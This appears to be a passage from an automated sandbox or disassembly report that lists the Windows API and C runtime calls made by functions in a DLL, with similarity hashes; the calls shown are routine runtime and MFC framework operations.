                                          • String ID: MOC$csm
                                          • API String ID: 803148776-1389381023
                                          APIs
                                          • lstrlenW.KERNEL32(?,?,?,?,?,6FAC49D6,?,00000003), ref: 6FAC5685
                                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,?,00000000,00000000), ref: 6FAC56B4
                                          • GetLastError.KERNEL32 ref: 6FAC56C5
                                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 6FAC56E5
                                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000000,00000000,00000000), ref: 6FAC5709
                                          Similarity
                                          • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                          • String ID:
                                          • API String ID: 3322701435-0
                                          APIs
                                          • lstrlenW.KERNEL32(?,?,?), ref: 6FACDA3D
                                          • _memset.LIBCMT ref: 6FACDA5B
                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 6FACDA75
                                          • lstrcmpW.KERNEL32(?,?,?,?), ref: 6FACDA87
                                          • SetWindowTextW.USER32(00000000,?), ref: 6FACDA93
                                            • Part of subcall function 6FAC6DC1: __CxxThrowException@8.LIBCMT ref: 6FAC6DD7
                                            • Part of subcall function 6FAC6DC1: __EH_prolog3.LIBCMT ref: 6FAC6DE4
                                          Similarity
                                          • API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
                                          • String ID:
                                          • API String ID: 4273134663-0
                                          APIs
                                          • __getptd.LIBCMT ref: 6FADFE1A
                                            • Part of subcall function 6FADA27F: __getptd_noexit.LIBCMT ref: 6FADA282
                                            • Part of subcall function 6FADA27F: __amsg_exit.LIBCMT ref: 6FADA28F
                                          • __amsg_exit.LIBCMT ref: 6FADFE3A
                                          • __lock.LIBCMT ref: 6FADFE4A
                                          • InterlockedDecrement.KERNEL32(?), ref: 6FADFE67
                                          • InterlockedIncrement.KERNEL32(028A1608), ref: 6FADFE92
                                          Similarity
                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                          • String ID:
                                          • API String ID: 4271482742-0
                                          APIs
                                          • __lock.LIBCMT ref: 6FAD4636
                                            • Part of subcall function 6FADA914: __mtinitlocknum.LIBCMT ref: 6FADA92A
                                            • Part of subcall function 6FADA914: __amsg_exit.LIBCMT ref: 6FADA936
                                            • Part of subcall function 6FADA914: RtlEnterCriticalSection.NTDLL(00000000), ref: 6FADA93E
                                          • ___sbh_find_block.LIBCMT ref: 6FAD4641
                                          • ___sbh_free_block.LIBCMT ref: 6FAD4650
                                          • HeapFree.KERNEL32(00000000,00000000,6FAEE828,0000000C,6FADA270,00000000,?,6FADA5D4,00000000,00000001,00000000,?,6FADA89E,00000018,6FAEE978,0000000C), ref: 6FAD4680
                                          • GetLastError.KERNEL32(?,6FADA5D4,00000000,00000001,00000000,?,6FADA89E,00000018,6FAEE978,0000000C,6FADA92F,00000000,00000000,?,6FADA32A,0000000D), ref: 6FAD4691
                                          Similarity
                                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                          • String ID:
                                          • API String ID: 2714421763-0
                                          APIs
                                          • TlsFree.KERNEL32(?,?,?,6FACC179), ref: 6FACC13B
                                          • GlobalHandle.KERNEL32(?), ref: 6FACC149
                                          • GlobalUnlock.KERNEL32(00000000), ref: 6FACC152
                                          • GlobalFree.KERNEL32(00000000), ref: 6FACC159
                                          • RtlDeleteCriticalSection.NTDLL ref: 6FACC163
                                            • Part of subcall function 6FACBF5D: RtlEnterCriticalSection.NTDLL(?), ref: 6FACBFBC
                                            • Part of subcall function 6FACBF5D: RtlLeaveCriticalSection.NTDLL(?), ref: 6FACBFCC
                                            • Part of subcall function 6FACBF5D: LocalFree.KERNEL32(?), ref: 6FACBFD5
                                            • Part of subcall function 6FACBF5D: TlsSetValue.KERNEL32(?,00000000), ref: 6FACBFE7
                                          Similarity
                                          • API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
                                          • String ID:
                                          • API String ID: 1549993015-0
                                          APIs
                                            • Part of subcall function 6FACC220: RtlEnterCriticalSection.NTDLL(6FAF34A8), ref: 6FACC25A
                                            • Part of subcall function 6FACC220: RtlInitializeCriticalSection.NTDLL(?), ref: 6FACC26C
                                            • Part of subcall function 6FACC220: RtlLeaveCriticalSection.NTDLL(6FAF34A8), ref: 6FACC279
                                            • Part of subcall function 6FACC220: RtlEnterCriticalSection.NTDLL(?), ref: 6FACC289
                                            • Part of subcall function 6FACBB0C: __EH_prolog3_catch.LIBCMT ref: 6FACBB13
                                            • Part of subcall function 6FAC6DC1: __CxxThrowException@8.LIBCMT ref: 6FAC6DD7
                                            • Part of subcall function 6FAC6DC1: __EH_prolog3.LIBCMT ref: 6FAC6DE4
                                          • GetProcAddress.KERNEL32(00000000,HtmlHelpW), ref: 6FAD1458
                                          • FreeLibrary.KERNEL32(?), ref: 6FAD1468
                                          Strings
                                          Similarity
                                          • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
                                          • String ID: HtmlHelpW$hhctrl.ocx
                                          • API String ID: 2853499158-3773518134
                                          APIs
                                          • GetModuleHandleA.KERNEL32(KERNEL32,6FAD77D7), ref: 6FADED7C
                                          • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 6FADED8C
                                          Strings
                                          Similarity
                                          • API ID: AddressHandleModuleProc
                                          • String ID: IsProcessorFeaturePresent$KERNEL32
                                          • API String ID: 1646373207-3105848591
                                          APIs
                                          Similarity
                                          • API ID: File$SizeTime_memset
                                          • String ID:
                                          • API String ID: 151880914-0
                                          APIs
                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6FAE084F
                                          • __isleadbyte_l.LIBCMT ref: 6FAE0883
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,6FAD40D8,6FAEBF84,00000000,00000000,?,?,?,?,6FAD40D8,00000000,?), ref: 6FAE08B4
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,6FAD40D8,00000001,00000000,00000000,?,?,?,?,6FAD40D8,00000000,?), ref: 6FAE0922
                                          Similarity
                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                          • String ID:
                                          • API String ID: 3058430110-0
                                          APIs
                                          Similarity
                                          • API ID: __msize_malloc
                                          • String ID:
                                          • API String ID: 1288803200-0
                                          APIs
                                          • GlobalLock.KERNEL32(?), ref: 6FAC88E7
                                          • lstrcmpW.KERNEL32(00000000,?), ref: 6FAC88F4
                                          • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6FAC892E
                                          • GlobalLock.KERNEL32(00000000), ref: 6FAC8938
                                            • Part of subcall function 6FACDAD1: GlobalFlags.KERNEL32(?), ref: 6FACDAE0
                                            • Part of subcall function 6FACDAD1: GlobalUnlock.KERNEL32(?), ref: 6FACDAF2
                                            • Part of subcall function 6FACDAD1: GlobalFree.KERNEL32(?), ref: 6FACDAFD
                                          Similarity
                                          • API ID: Global$Lock$AllocFlagsFreeUnlocklstrcmp
                                          • String ID:
                                          • API String ID: 2391069079-0
                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(?), ref: 6FACBFBC
                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 6FACBFCC
                                          • LocalFree.KERNEL32(?), ref: 6FACBFD5
                                          • TlsSetValue.KERNEL32(?,00000000), ref: 6FACBFE7
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                          • String ID:
                                          • API String ID: 2949335588-0
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 6FAC8ED0
                                            • Part of subcall function 6FAC9C7C: __EH_prolog3.LIBCMT ref: 6FAC9C83
                                          • __wcsdup.LIBCMT ref: 6FAC8EF2
                                          • GetCurrentThread.KERNEL32 ref: 6FAC8F1F
                                          • GetCurrentThreadId.KERNEL32 ref: 6FAC8F28
                                          Similarity
                                          • API ID: CurrentH_prolog3Thread$__wcsdup
                                          • String ID:
                                          • API String ID: 190065205-0
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 6FAC6A8A
                                            • Part of subcall function 6FAC68E2: _malloc.LIBCMT ref: 6FAC6900
                                          • __CxxThrowException@8.LIBCMT ref: 6FAC6AC0
                                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000800,6FAC16A6,00000000,00000000,?,?,6FAED898,00000004,6FAC16A6,00000000,6FAC69F9,00000000), ref: 6FAC6AEA
                                          • LocalFree.KERNEL32(6FAC16A6,6FAC16A6,00000000,6FAC69F9,00000000), ref: 6FAC6B12
                                          Similarity
                                          • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc
                                          • String ID:
                                          • API String ID: 1776251131-0
                                          APIs
                                          • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 6FACD194
                                          • RegCloseKey.ADVAPI32(00000000), ref: 6FACD19D
                                          • swprintf.LIBCMT ref: 6FACD1BA
                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 6FACD1CB
                                          Similarity
                                          • API ID: ClosePrivateProfileStringValueWriteswprintf
                                          • String ID:
                                          • API String ID: 22681860-0
                                          APIs
                                            • Part of subcall function 6FAC68E2: _malloc.LIBCMT ref: 6FAC6900
                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 6FAC72BB
                                          • GetCurrentProcess.KERNEL32(?,00000000), ref: 6FAC72C1
                                          • DuplicateHandle.KERNEL32(00000000), ref: 6FAC72C4
                                          • GetLastError.KERNEL32(?), ref: 6FAC72DF
                                          Similarity
                                          • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                          • String ID:
                                          • API String ID: 3704204646-0
                                          APIs
                                          • GetTopWindow.USER32(?), ref: 6FAD0F9D
                                          • GetTopWindow.USER32(00000000), ref: 6FAD0FDC
                                          • GetWindow.USER32(00000000,00000002), ref: 6FAD0FFA
                                          Similarity
                                          • API ID: Window
                                          • String ID:
                                          • API String ID: 2353593579-0
                                          APIs
                                          Similarity
                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                          • String ID:
                                          • API String ID: 3016257755-0
                                          APIs
                                          • GetDlgItem.USER32(?,?), ref: 6FAD03DC
                                          • GetTopWindow.USER32(00000000), ref: 6FAD03EF
                                            • Part of subcall function 6FAD03CF: GetWindow.USER32(00000000,00000002), ref: 6FAD0436
                                          • GetTopWindow.USER32(?), ref: 6FAD041F
                                          Similarity
                                          • API ID: Window$Item
                                          • String ID:
                                          • API String ID: 369458955-0
                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(6FAF34A8), ref: 6FACC25A
                                          • RtlInitializeCriticalSection.NTDLL(?), ref: 6FACC26C
                                          • RtlLeaveCriticalSection.NTDLL(6FAF34A8), ref: 6FACC279
                                          • RtlEnterCriticalSection.NTDLL(?), ref: 6FACC289
                                            • Part of subcall function 6FAC6DC1: __CxxThrowException@8.LIBCMT ref: 6FAC6DD7
                                            • Part of subcall function 6FAC6DC1: __EH_prolog3.LIBCMT ref: 6FAC6DE4
                                          Similarity
                                          • API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
                                          • String ID:
                                          • API String ID: 2895727460-0
                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(6FAF32EC), ref: 6FACBA69
                                          • TlsGetValue.KERNEL32(6FAF32D0,?,?,?,?,6FACC0B7,?,00000004,6FACAF00,6FAC6DDD,6FAC68AD,?,6FAD4902,?), ref: 6FACBA7D
                                          • RtlLeaveCriticalSection.NTDLL(6FAF32EC), ref: 6FACBA93
                                          • RtlLeaveCriticalSection.NTDLL(6FAF32EC), ref: 6FACBA9E
                                          Similarity
                                          • API ID: CriticalSection$Leave$EnterValue
                                          • String ID:
                                          • API String ID: 3969253408-0
                                          APIs
                                          • __getptd.LIBCMT ref: 6FAE0586
                                            • Part of subcall function 6FADA27F: __getptd_noexit.LIBCMT ref: 6FADA282
                                            • Part of subcall function 6FADA27F: __amsg_exit.LIBCMT ref: 6FADA28F
                                          • __getptd.LIBCMT ref: 6FAE059D
                                          • __amsg_exit.LIBCMT ref: 6FAE05AB
                                          • __lock.LIBCMT ref: 6FAE05BB
                                          Similarity
                                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                          • String ID:
                                          • API String ID: 3521780317-0
                                          APIs
                                            • Part of subcall function 6FACA59C: GetModuleHandleW.KERNEL32(KERNEL32,6FACA6B6), ref: 6FACA5AA
                                            • Part of subcall function 6FACA59C: GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6FACA5CB
                                            • Part of subcall function 6FACA59C: GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6FACA5DD
                                            • Part of subcall function 6FACA59C: GetProcAddress.KERNEL32(ActivateActCtx), ref: 6FACA5EF
                                            • Part of subcall function 6FACA59C: GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6FACA601
                                          • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6FACA6D0
                                          • SetLastError.KERNEL32(0000006F), ref: 6FACA6E7
                                          Strings
                                          Similarity
                                          • API ID: AddressProc$Module$ErrorFileHandleLastName
                                          • String ID:
                                          • API String ID: 2524245154-3916222277
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6FAC8E78
                                          • PathFindExtensionW.SHLWAPI(?), ref: 6FAC8E8E
                                            • Part of subcall function 6FAC8BDF: __EH_prolog3_GS.LIBCMT ref: 6FAC8BE9
                                            • Part of subcall function 6FAC8BDF: GetModuleHandleW.KERNEL32(kernel32.dll,00000260,6FAC8EB7,?,?), ref: 6FAC8C19
                                            • Part of subcall function 6FAC8BDF: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6FAC8C2D
                                            • Part of subcall function 6FAC8BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6FAC8C69
                                            • Part of subcall function 6FAC8BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6FAC8C77
                                            • Part of subcall function 6FAC8BDF: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6FAC8C94
                                            • Part of subcall function 6FAC8BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6FAC8CBF
                                            • Part of subcall function 6FAC8BDF: ConvertDefaultLocale.KERNEL32(000003FF), ref: 6FAC8CC8
                                            • Part of subcall function 6FAC8BDF: GetModuleFileNameW.KERNEL32(6FAC0000,?,00000105), ref: 6FAC8D7F
                                          Strings
                                          Similarity
                                          • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
                                          • String ID: %s%s.dll
                                          • API String ID: 1311856149-1649984862
                                          APIs
                                            • Part of subcall function 6FAD5017: __getptd.LIBCMT ref: 6FAD501D
                                            • Part of subcall function 6FAD5017: __getptd.LIBCMT ref: 6FAD502D
                                          • __getptd.LIBCMT ref: 6FADC54B
                                            • Part of subcall function 6FADA27F: __getptd_noexit.LIBCMT ref: 6FADA282
                                            • Part of subcall function 6FADA27F: __amsg_exit.LIBCMT ref: 6FADA28F
                                          • __getptd.LIBCMT ref: 6FADC559
                                          Strings
                                          Similarity
                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                          • String ID: csm
                                          • API String ID: 803148776-1018135373